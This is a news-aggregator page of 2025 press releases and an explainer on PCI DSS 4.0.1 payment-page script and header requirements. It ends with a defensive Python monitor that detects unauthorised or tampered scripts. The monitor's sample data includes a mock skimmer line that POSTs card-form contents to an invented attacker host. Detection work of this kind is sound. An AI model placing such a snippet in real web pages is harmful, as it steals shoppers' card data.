Latest news with #PCIDSS4.0.1
Yahoo
28-05-2025
- Business
- Yahoo
c/side Evaluated by VikingCloud Against New PCI DSS 4.0.1 Security Requirements
An independent technical review highlights how c/side's platform can protect against and mitigate attacks relevant to PCI DSS requirements 6.4.3 and 11.6.1.

SAN FRANCISCO, May 28, 2025 (GLOBE NEWSWIRE) -- c/side, which specializes in securing vulnerable web dependencies, today announced the results of a technical review conducted by global cybersecurity firm VikingCloud. The assessment evaluated how c/side's platform may help organizations address PCI DSS 4.0.1 requirements 6.4.3 and 11.6.1. Since the end-of-March 2025 deadline for the standard's future-dated requirements, merchants and service providers must inventory, authorize and integrity-check the scripts loaded and executed in the consumer's browser on payment pages (6.4.3), and detect and alert on unauthorized changes to the HTTP headers and script contents of those pages (11.6.1).

VikingCloud's technical review found that, when properly configured, c/side's proxy-based and agentless implementations can help detect and mitigate certain client-side attack scenarios related to those two requirements. The full technical review is available here. VikingCloud and c/side will discuss client-side security gaps and PCI DSS compliance during a webinar on June 24; register here.

'VikingCloud's technical review highlights how c/side's capabilities can support organizations in addressing critical browser-based threats and aligning with evolving PCI DSS requirements,' said Mike Kutlu, GTM Operations, c/side. 'These are not theoretical risks. Client-side attacks are happening every day, and companies need a solution that keeps up. c/side offers exactly that, and we believe this review offers helpful third-party insight into how c/side fits into that effort.'

Findings from VikingCloud's technical review
VikingCloud, a global cybersecurity and PCI compliance firm, conducted a multi-week technical assessment of the c/side platform under a contracted engagement. The review included controlled testing scenarios involving client-side threats such as keyloggers and script tampering attacks. The evaluation noted that c/side's proxy-based architecture enables real-time inspection and blocking of malicious scripts, while the agentless approach provides periodic crawl-based analysis with shared threat intelligence. Both methods offer compliance-ready monitoring, alerting, and reporting.

Built for real-world use cases
The c/side platform is engineered for flexibility. Its proxy deployment offers continuous, real-time monitoring without requiring code changes, while the agentless mode supports teams with limited engineering resources or external development partners. Both configurations integrate with popular compliance and security tools such as AWS S3, Vanta, Drata, and Sprinto. To simplify compliance reporting, c/side automatically generates weekly script and header change reports aligned to PCI DSS audit requirements; weekly matches the minimum frequency 11.6.1 sets for the change-and-tamper-detection mechanism (at least once every seven days, unless the entity's targeted risk analysis defines a different frequency). These reports eliminate guesswork for IT teams and streamline auditor communication.

To learn more about how c/side supports PCI DSS 4.0.1 compliance, visit:
VikingCloud and c/side will discuss client-side security gaps and PCI DSS compliance during a webinar on June 24. To register for the VikingCloud and c/side webinar, visit:

Disclaimer: The technical review described in this release was conducted by VikingCloud under a contracted engagement with c/side. The findings reflect a point-in-time assessment of the c/side platform's capabilities in relation to PCI DSS requirements 6.4.3 and 11.6.1. This review does not constitute an endorsement, certification, or formal validation of PCI DSS compliance by VikingCloud. Organizations using the c/side platform remain responsible for conducting their own PCI DSS assessments and working with a Qualified Security Assessor (QSA) or other authorized party to determine compliance.

About c/side
c/side is a venture-backed cybersecurity company specializing in browser-side threat detection and protection. The company's platform provides complete visibility and control over vulnerable first- and third-party scripts running on websites, protecting sensitive visitor data while ensuring optimal website performance. c/side's technology enables customers to secure their web supply chain against sophisticated attacks and streamlines compliance with regulations such as PCI DSS 4.0.1.

Contact: Kyle Peterson, kyle@

Associated Press
08-05-2025
- Business
- Associated Press
G2A.COM achieves PCI DSS 4.0.1 recertification, strengthening its leadership in payment security.
LONDON, UNITED KINGDOM, May 8, 2025 -- G2A.COM, the world's largest marketplace for digital entertainment, has successfully renewed its compliance with the Payment Card Industry Data Security Standard (PCI DSS), achieving certification under the latest version, 4.0.1. This recertification reinforces G2A's continued commitment to safeguarding user data and upholding the highest global standards of payment security.

The PCI DSS standard, established by the PCI Security Standards Council, is a mandatory compliance framework for any company that stores, processes, or transmits cardholder data. Major global brands such as Amazon, Apple, and Microsoft maintain this certification, and G2A is proud to stand alongside them in prioritizing secure commerce.

'The renewal of our PCI DSS certification – especially under the latest and most stringent version – underscores our long-term dedication to protecting our users' data at every stage of the payment process,' said Dorota Wróbel, General Manager at G2A. 'Security isn't a checkbox – it's a mindset that runs through every system, every process, and every person at G2A.'

Upgrading to PCI DSS 4.0.1 is a new standard in vigilance
Version 4.0 of PCI DSS (4.0.1 is a limited revision that corrects and clarifies it) introduced a major evolution in how organizations must operate. Unlike earlier iterations, it transforms compliance from a one-time project into an ongoing security program, requiring organizations to implement continuous monitoring, proactive risk mitigation, and security-by-design development practices. G2A's infrastructure and operations were assessed by Patronusec, a Qualified Security Assessor (QSA), as part of a comprehensive audit covering nearly 270 security controls across people, processes, and technologies. The recertification validates the integrity of G2A's security architecture and the robustness of its payment ecosystem. Achieving this certification is far from a formality; it requires thorough preparation across every area of data security.

Building trust through security
First certified in February 2024, G2A has now maintained its PCI DSS compliance for a second consecutive year. The renewal, awarded in February, confirms that the company continues to meet – and exceed – the industry's most demanding cybersecurity requirements. The first year is the most challenging, as it introduces a range of new and complex security processes that must be implemented and strictly followed. Compliance is not declarative – it must be proven with evidence during recertification audits.

'For our millions of global users, trust is everything,' said Dorota Wróbel. 'This certification is one of many ways we prove that we take that trust seriously – not just once a year, but every single day.'

To learn more, visit G2A's corporate website.
– ENDS –

About G2A.COM
G2A.COM is the world's largest and most trusted marketplace for digital entertainment, where more than 35 million people from 180 countries have purchased over 135 million items. Users can choose from more than 90,000 digital offerings, including games, DLCs, in-game items, and non-gaming items such as gift cards, subscriptions, software, and e-learning, sold by sellers from all over the world. G2A.COM leads in online security, having been awarded the CNP Award for Best Merchant Team of the Year in Anti-fraud and Cybersecurity, alongside companies such as Microsoft, Barclays Bank, and First Data.

Contact: Julia Horvath Ranieri
Legal Disclaimer: EIN Presswire provides this news content 'as is' without warranty of any kind and accepts no responsibility or liability for the accuracy, content, images, videos, licenses, completeness, legality, or reliability of the information contained in this article.


Techday NZ
05-05-2025
- Business
- Techday NZ
WitnessAI 2.0 boosts PCI DSS compliance & AI risk controls
WitnessAI has announced the release of WitnessAI 2.0, offering new tools to help enterprises meet PCI DSS 4.0.1 compliance requirements while integrating AI technologies. The updated platform introduces five significant features: PCI-specific AI controls with measures to prevent payment data loss, agentless and proxy-less policy enforcement for remote employees, risk analytics for AI usage, detection of insider threats across AI platforms, and a privacy mode tailored for applications such as Microsoft Copilot.

The release of WitnessAI 2.0 comes as organisations face increased obligations under revised PCI DSS standards to address risks presented by artificial intelligence tools. The PCI Security Standards Council recently issued new guidelines outlining how AI should factor into PCI assessments, highlighting the need to control and monitor all technologies with access to cardholder data environments.

The company's new update features PCI DSS-specific controls and reporting, which align AI activity with the 4.0.1 standard and incorporate focused protections against payment card data loss. Additionally, the platform's remote employee controls support compliance for staff working in hybrid, remote, or travelling situations without requiring software installation or changes to network architecture. Behavioural and runtime analytics form part of the regulatory risk analytics tools, offering organisations detailed insights to identify and remedy potential compliance gaps as they expand their use of AI. Insider threat detection capabilities use analysis of user interactions over time and across AI systems to flag compromised or malicious accounts that could lead to breaches. Privacy controls have also been enhanced, with an executive privacy mode designed to protect confidential internal discussions on AI platforms, specifically catering to tools like Microsoft Copilot.

Rick Caccia, Chief Executive Officer and Co-founder of WitnessAI, commented on the regulatory compliance landscape with artificial intelligence: "Too often, AI regulatory compliance focuses on future-facing regulations such as the EU AI Act. But employee AI usage brings significant risk to the regulations, such as PCI DSS, that companies face today. With WitnessAI 2.0, any organisation subject to PCI DSS can ensure complete compliance and easy reporting of control effectiveness."

David Neuman, Senior Analyst at TAG Infosphere, highlighted organisations' shifting work environment and compliance issues. He said, "The ability to enforce AI use policies regardless of where employees work is critical for PCI compliance. The new guidelines around AI use in PCI assessments will become an increasingly significant concern for organisations, even as they continue to adapt to PCI DSS 4.0.1 requirements."

Jonathan Kennedy, Chief Information Security Officer at InComm Payments, shared his organisation's experience using WitnessAI. "We're focused on ensuring intellectual property and sensitive information isn't accidentally leaked. WitnessAI helps us achieve security and compliance with our diverse portfolio, reducing risk while maximising productivity."

WitnessAI's platform is designed to help regulated industries manage compliance and security as they introduce AI into their workflows. Its recognition as a finalist in the Best Compliance Solution category at the 2025 SC Awards underscores its position in supporting organisations navigating established and emerging artificial intelligence regulations.


Business Wire
30-04-2025
- Business
- Business Wire
WitnessAI 2.0 Delivers New Regulatory Compliance Capabilities to Support Safe AI Adoption
MOUNTAIN VIEW, Calif.--(BUSINESS WIRE)-- WitnessAI, creator of the first enablement platform for safe AI use and a finalist for the SC Awards for Best Compliance Solution, today announced the release of WitnessAI 2.0, offering five key updates for organizations looking to remain compliant with regulations such as the Payment Card Industry Data Security Standard (PCI DSS) while adopting enterprise AI tools.
- PCI DSS-Specific Controls and Reports: AI activity controls mapped directly to PCI DSS 4.0.1, including payment card data loss prevention.
- Remote Employee Controls: The industry's first and only zero-install, agentless and proxy-less capability for AI observability and policy control. This feature ensures compliance in remote, traveling, or hybrid environments.
- Regulatory Risk Analytics: Behavioral and runtime analytics can provide insight into best practices, potential risks, and areas for improvement as organizations develop their AI strategies and put them into practice.
- AI Insider Threat Detection: By analyzing conversations over time and across AI applications, WitnessAI can detect compromised or malicious user accounts likely to cause data breach or theft.
- Executive Privacy Mode: Applications like Microsoft Copilot can share data in unexpected and insecure ways. Executives can now leverage Copilot and other AI tools with enhanced privacy controls, keeping internal AI conversations private.

'Too often, AI regulatory compliance focuses on future-facing regulations such as the EU AI Act,' said Rick Caccia, CEO and Co-founder at WitnessAI. 'But employee AI usage brings significant risk to the regulations, such as PCI DSS, that companies face today. With WitnessAI 2.0, any organization subject to PCI DSS can ensure complete compliance and easy reporting of control effectiveness.'

The PCI Security Standards Council recently released guidelines for 'Integrating Artificial Intelligence in PCI Assessments,' demonstrating growing recognition of AI's role in payment security ecosystems. Under PCI DSS 4.0.1, organizations must carefully scope and secure all systems that 'could impact the security of the CDE' (Cardholder Data Environment), a criterion that implicitly includes AI tools with access to sensitive environments. WitnessAI provides the visibility, control, and protection needed to ensure that these AI interactions comply with PCI requirements, helping organizations maintain regulatory compliance while safely leveraging AI capabilities.

"The ability to enforce AI use policies regardless of where employees work is critical for PCI compliance," stated David Neuman, Senior Analyst, TAG Infosphere. "The new guidelines around AI use in PCI assessments will become an increasingly significant concern for organizations, even as they continue to adapt to PCI DSS 4.0.1 requirements. Organizations face real challenges in ensuring compliance when employees work away from the corporate network, like during travel or just working from home. Maintaining flexibility while having complete confidence in compliance posture isn't just desirable, it's a business necessity."

As more organizations grapple with the complexities of maintaining compliance and preventing data loss, innovative solutions become paramount. This is precisely why FinTech provider InComm Payments turned to WitnessAI. "We're focused on ensuring intellectual property and sensitive information isn't accidentally leaked," said Jonathan Kennedy, CISO at InComm Payments. "We knew we needed a way to maintain security and compliance while encouraging our teams to leverage modern approaches with GenAI applications. We chose WitnessAI because they help us achieve just that with our diverse portfolio. Our compliance, data-loss prevention, and privacy teams now have total visibility and confidence in our AI security. We're reducing risk while maximizing our productivity because of WitnessAI."

WitnessAI is designed to address the unique and ongoing compliance challenges of AI in regulated environments, offering a platform that will evolve with AI regulations as they emerge. The WitnessAI Secure AI Enablement Platform was recognized as a 2025 SC Awards finalist in the 'Best Compliance Solution' category, showing a proven dedication to helping businesses navigate the intersection between AI innovation and compliance. View the full list of 2025 SC Awards finalists here:

WitnessAI is in use by global organizations today, detecting shadow AI, providing full visibility into user activity, and protecting users and data from loss and harm. Security and privacy leaders interested in a demonstration of the WitnessAI platform can contact the company at demo@

WitnessAI enables safe and effective adoption of enterprise AI through security and governance guardrails for public and private LLMs. The WitnessAI Secure AI Enablement Platform provides visibility of employee AI use, control of that use via AI-oriented policy, and protection of that use via data and topic security. Learn more at


Zawya
06-03-2025
- Business
- Zawya
How new PCI Standards will change online security for retailers?
In order to comply with the future-dated requirements of PCI DSS 4.0.1, merchants must implement a series of new security measures. The requirements come into effect now, at the end of March 2025, and will help to protect consumers and retailers against online fraud. As e-commerce has grown, so too has the number of bad actors looking to exploit security weaknesses to steal credit card data from checkout pages, an attack known as e-skimming.

Each year, thousands of card details are stolen in online card transactions, even on well-known and big-brand websites. Attackers are becoming increasingly sneaky: even if a merchant's card capture form is secure, they can exploit weaknesses elsewhere on the website, for example in a third-party script, and intercept card data in the customer's browser before it ever reaches the merchant's secure payment form. That is why PCI DSS 4.0.1 requires retailers to secure their entire website, not just the form. Reputable payment platforms meet the highest standards of payment security, which reduces the scope of compliance efforts for retailers, but there are still steps merchants need to take to ensure that their site is fully compliant.

PCI what?
The Payment Card Industry Data Security Standard (PCI DSS) is a set of requirements that retailers must comply with, no matter their size. The standard is updated from time to time, and the latest version, PCI DSS 4.0.1, has future-dated requirements that come into effect at the end of March 2025. PCI DSS 4.0.1 enforces stricter security measures for the entire site to prevent attacks like e-skimming and to ensure secure payment processing. It is designed to enhance the security of cardholder data by adopting a comprehensive approach to security measures and access controls. This means that merchants are responsible for securing every part of the payment flow, ensuring that both the payment form and the hosting web environment are protected.

PCI DSS 4.0.1 has stronger password and multi-factor authentication requirements. It also has improved security practices, with updates for e-commerce security and third-party risk management. It is more flexible, allowing a customised approach to meeting a requirement, and comes with improved guidance and examples.

What does this mean for retailers?
The new requirements oblige merchants to take a more active role in securing payment pages and proactively monitoring for signs of compromise. In particular, there are two requirements which merchants need to act on before the end of March 2025.

Firstly (requirement 6.4.3), merchants have to keep an inventory of all scripts loaded and executed in the customer's browser on their payment pages, including those from third parties. Every script has to be authorised with a written justification, and merchants must ensure that scripts have not been tampered with, for example by pinning each one to a known hash. Testing for unauthorised scripts is mandatory. This is essential because attackers who compromise a third-party script can steal card data directly from customers' browsers.

Secondly (requirement 11.6.1), merchants need a change-and-tamper-detection mechanism that monitors payment pages for unexpected changes to the HTTP headers and script contents as received by the customer's browser. The mechanism must alert personnel to suspicious changes so that attacks are detected and responded to quickly, and it must run at least once every seven days, or at a frequency defined in the merchant's targeted risk analysis. This is important because attackers who can modify a web page may redirect customers to fake sites or steal their data.

The requirements themselves apply to every merchant; what changes with transaction volume is how compliance must be validated (an annual on-site assessment by a Qualified Security Assessor at Level 1, a Self-Assessment Questionnaire at the lower levels). The card brands define the levels; Visa's, for example, are:
- Level 1: Over 6 million transactions per year
- Level 2: 1-6 million transactions per year
- Level 3: 20,000-1 million e-commerce transactions per year
- Level 4: Fewer than 20,000 e-commerce transactions per year

Next steps for retailers
Think of your website security the same way you would your home security. Each time you leave your house, you lock the doors and close the windows, and probably set an alarm system. Ensuring your website is PCI DSS 4.0.1 compliant essentially locks the doors and windows on your website and guards against e-skimming. It's imperative that you comply to protect your customers and your business. Some helpful next steps:
- Determine your merchant level and your scope: the level is set by your transaction volume; the scope (which systems the standard applies to) is determined by how you store, process, or transmit cardholder data and which systems could affect its security.
- Understand the requirements by reviewing PCI DSS v4.0.1 (available for download from the PCI Security Standards Council).
- Assess your current security level by identifying gaps and areas for improvement.
- Implement the necessary controls for your chosen integration method (a payment page hosted entirely by a compliant provider reduces what you must protect directly, while a form embedded in your own pages keeps those pages fully in scope).
- Document your compliance efforts: maintain records of policies, procedures, and assessments.
- Regularly monitor and maintain compliance.
For some retailers, this may all seem quite foreign. The first step is to speak to your webmaster about what needs to be done.
All rights reserved. © 2022. Provided by SyndiGate Media Inc. (
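The two checks the article describes (an inventory of authorised payment-page scripts with integrity verification for 6.4.3, and change-and-tamper detection on the page's headers and scripts for 11.6.1) can be implemented as a crawl-and-diff monitor. The following is an added example written for this page; it is not code from the article or from any vendor named above. The HTML, the script bodies, the header values and the skimmer host are all constructed sample data, and the baseline is assumed to have been captured from a version of the page that was reviewed and authorised.

```python
"""Baseline-and-diff monitor for a payment page's scripts and HTTP headers.

Added example for PCI DSS 4.0.1 requirements 6.4.3 / 11.6.1; not from the
article or any vendor. All sample data below is constructed.
"""
import base64
import hashlib
import re
from typing import Callable

# Constructed sample: the authorised baseline page and a later crawl in which an
# attacker has injected a script and modified checkout.js. Hosts are invented.
BASELINE_HTML = """<html><head>
<script src="https://static.shop.example/checkout.js"></script>
<script>window.shopConfig = {currency: "USD"};</script>
</head><body><form id="card-form"></form></body></html>"""

OBSERVED_HTML = """<html><head>
<script src="https://static.shop.example/checkout.js"></script>
<script>window.shopConfig = {currency: "USD"};</script>
<script src="https://cdn.invented-skimmer.example/s.js"></script>
</head><body><form id="card-form"></form></body></html>"""

# Bodies of the external scripts as fetched at baseline time and at crawl time
# (constructed; a real monitor fetches them over HTTPS).
BASELINE_BODIES = {
    "https://static.shop.example/checkout.js": b"function pay(){/* v1 */}",
}
OBSERVED_BODIES = {
    "https://static.shop.example/checkout.js":
        b"function pay(){/* v1 */}\n"
        b"fetch('https://cdn.invented-skimmer.example/c',"
        b"{method:'POST',body:document.forms[0].innerText});",
    "https://cdn.invented-skimmer.example/s.js":
        b"document.addEventListener('keydown',e=>{});",
}

# Response headers at baseline and at crawl time; the CSP header has vanished.
BASELINE_HEADERS = {
    "content-security-policy": "script-src 'self' https://static.shop.example",
    "strict-transport-security": "max-age=31536000",
}
OBSERVED_HEADERS = {"strict-transport-security": "max-age=31536000"}

# Headers whose presence or value matters for payment-page integrity.
WATCHED_HEADERS = ("content-security-policy", "strict-transport-security",
                   "x-frame-options")

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)


def sri(content: bytes) -> str:
    """Subresource Integrity digest (sha384, base64) of a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


def integrity_attribute(url: str, digest: str) -> str:
    """Script tag that makes the browser refuse a file whose digest has changed."""
    return f'<script src="{url}" integrity="{digest}" crossorigin="anonymous"></script>'


def inventory(html: str, fetch: Callable[[str], bytes]) -> dict:
    """Map every script on the page to its SRI digest.

    External scripts are keyed by src URL and hashed over the fetched body;
    inline scripts are keyed by position and hashed over their text.
    """
    entries = {}
    inline_n = 0
    for attrs, body in SCRIPT_RE.findall(html):
        match = SRC_RE.search(attrs)
        if match:
            url = match.group(1)
            entries[url] = sri(fetch(url))
        else:
            inline_n += 1
            entries[f"inline#{inline_n}"] = sri(body.strip().encode())
    return entries


def diff(baseline_scripts: dict, observed_scripts: dict,
         baseline_headers: dict, observed_headers: dict) -> list:
    """Compare a crawl against the authorised baseline; returns (severity, message) findings."""
    findings = []
    for key, digest in observed_scripts.items():
        if key not in baseline_scripts:
            findings.append(("high", f"unauthorized script: {key}"))
        elif digest != baseline_scripts[key]:
            findings.append(("high", f"integrity changed: {key}"))
    for key in baseline_scripts.keys() - observed_scripts.keys():
        findings.append(("medium", f"authorized script missing: {key}"))
    for name in WATCHED_HEADERS:
        before, after = baseline_headers.get(name), observed_headers.get(name)
        if before != after:
            findings.append(("high", f"header changed: {name}: {before!r} -> {after!r}"))
    return findings


def run_check() -> list:
    """One scheduled run: rebuild the inventory from the crawl and diff it against the baseline."""
    base = inventory(BASELINE_HTML, BASELINE_BODIES.__getitem__)
    seen = inventory(OBSERVED_HTML, OBSERVED_BODIES.__getitem__)
    return diff(base, seen, BASELINE_HEADERS, OBSERVED_HEADERS)


if __name__ == "__main__":
    for severity, message in run_check():
        print(f"[{severity}] {message}")
```

Run as a scheduled job (weekly is the 11.6.1 floor; daily is cheap) against the live payment page with a real fetcher in place of the dictionaries, and route every non-empty result to an alert. The digests the baseline records can also be placed in each script tag's integrity attribute via integrity_attribute(), so the browser itself rejects a modified external file; that covers the integrity part of 6.4.3 for external scripts, while the header diff covers the part of 11.6.1 that no browser-side control can see. A changed digest on an authorised script is still a finding: a legitimate vendor update and a tampered file look identical until someone reviews the change and re-baselines.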